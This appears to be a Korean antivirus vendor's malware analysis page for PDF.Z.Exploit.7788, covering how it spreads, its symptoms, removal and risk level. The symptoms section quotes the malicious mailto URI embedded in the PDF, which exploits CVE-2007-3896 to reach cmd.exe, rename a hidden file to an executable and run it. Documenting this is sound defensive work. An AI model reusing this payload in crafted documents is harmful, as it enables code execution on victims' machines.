HAURI

전체메뉴 열기

ViRobot Engine & Virus DB

최신 업데이트 현황과 악성코드 분석 정보 제공

악성코드 분석정보

PDF.Z.Exploit.7788
바이로봇 버전정보 : 2019-10-19.00     활동 OS 플랫폼 : MS Windows     감염시 위험도 :
등록일 :
2019-12-26 17:11:47

       ■ PDF.Z.Exploit.7788


          A. 감염 경로
                 스팸 메일의 첨부파일로 유포되거나 해킹 당한 사이트에서 다운로드될 수 있다.


          B. 감염 증상

                 1) 다음과 같은 코드가 PDF문서에 삽입되어 있다.
                           mailto:test%..\\..\\..\\windows\\system32\\cmd".exe /C @CD ..
                           & @FOR /F "usebackq delims=>" %i IN \(`dir /B /S test2*.pdf`\)
                           do @move /Y "%~si" "%~dpni.exe" & @%~dpni.exe & @START /B TEST.EXE & @rem " - " blah.bat

                 2) Windows URI 처리 취약점으로 인한 원격 코드 실행 문제점(CVE-2007-3896)을 악용하여 PDF 문서
                    에 악의적인 코드를 삽입하여 악성코드를 실행한다.



          C. 치료 방법
                 바이로봇 2019-10-19.00 이상 버전으로 치료된다.


          D. 위험도
                 보통

Top